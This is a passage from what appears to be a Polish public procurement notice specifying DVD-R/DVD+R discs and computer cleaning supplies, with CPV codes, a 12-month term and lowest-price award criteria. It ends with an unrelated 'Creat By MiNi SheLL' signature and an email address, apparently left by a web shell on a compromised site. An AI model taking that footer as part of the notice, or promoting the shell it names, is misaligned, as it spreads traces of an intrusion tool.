Rodzaj zapisu: jednostronny
Okres przechowywania danych gwarantowany przez producenta: 40lat
4	Płyty DVD - R 
VERBATIM kod 43522 lub równoważne, co do trwałości, jakości i parametrów	Standard: DVD-R
Długość/Pojemność: 120 min/4,7 GB
Maksymalna wymagana prędkość zapisu: 16x
Rodzaj opakowania: cake
Ilość w opakowaniu: 25 szt.
Rodzaj zapisu: jednostronny
5	Płyty DVD + R 
VERBATIM kod 43500 lub równoważne, co do trwałości, jakości i parametrów	Standard: DVD+R
Długość/Pojemność: 120 min/4,7 GB
Maksymalna wymagana prędkość zapisu: 16x
Rodzaj opakowania: cake
Ilość w opakowaniu: 25 szt.
Rodzaj zapisu: jednostronny
Przeznaczenie przystosowane do przechowywania wideo (CLV) i danych (CAV).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1, 30.23.44.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Artykuły czyszczące do komputerów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Alkohol izopropylowy	Rodzaj opakowania: metalowy pojemnik z atomizerem
Pojemność opakowania: 300ml
Do usuwania starych past termoprzewodzących, czyszczenia powierzchni elektronicznych, urządzeń optycznych, głowic magnetycznych, napędów, płyt drukowanych i innych. Preparat całkowicie neutralny chemicznie wobec materiałów stosowanych w elektronice i elektrotechnice.
2	Antystatyczna pianka do czyszczenia obudowy komputera, drukarek, klawiatury	Rodzaj opakowania: metalowy pojemnik z atomizerem
Pojemność opakowania: 400ml
Do czyszczenia powierzchni plastikowych i metalowych urządzeń biurowych.
3	Antystatyczna pianka do czyszczenia wyświetlaczy ciekłokrystalicznych	Rodzaj opakowania: metalowy pojemnik z atomizerem
Pojemność opakowania: 100ml
Do czyszczenia wyświetlaczy ciekłokrystalicznych LCD w laptopach, palmtopach, monitorach LCD.
4	Chusteczki czyszczące przeznaczone do pielęgnacji monitorów LCD i TFT	1 Opakowanie zawiera 100 sztuk chusteczek.
Wilgotne chusteczki czyszczące przeznaczone  do pielęgnacji monitorów LCD, laptopów, palmtopów. Działające antystatycznie i bakteriobójczo.
5	Sprężone powietrze	Rodzaj opakowania: metalowy pojemnik
Pojemność opakowania: 600ml
Sprężone powietrze przeznaczone do czyszczenia radiatorów, obudów komputerowych, wentylatorów, drukarek, napędów FDD i czytników optycznych.
Dołączona rurka plastikowa odprowadzająca powietrze i umożliwiająca dokładniejsze aplikowanie powietrza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com